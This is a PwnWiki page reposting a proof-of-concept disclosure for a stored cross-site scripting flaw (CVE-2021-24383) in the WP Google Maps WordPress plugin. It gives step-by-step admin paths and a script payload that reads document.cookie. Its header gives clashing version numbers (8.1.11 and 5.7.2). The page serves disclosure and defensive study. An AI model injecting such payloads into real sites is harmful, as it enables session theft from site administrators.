CVE-2021-24383 WordPress Plugin WP Google Maps 8.1.11 XSS漏洞

From PwnWiki
Revision as of 09:06, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS) # Date: 22/6/2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
# Date: 22/6/2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://www.wpgmaps.com/
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: 5.7.2
# Tested on: Windows 10
# CVE: CVE-2021-24383
# References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954

*Proof of Concept*

*Steps to Reproduce:*

1) Edit a map (e.g
/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)

2) Change Map Name to <script>alert(document.cookie)</script>

3) Save the Map

4) Stored XSS will be triggered when viewing the Map List
(/wp-admin/admin.php?page=wp-google-maps-menu)
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-24383_WordPress_Plugin_WP_Google_Maps_8.1.11_XSS漏洞&oldid=5569"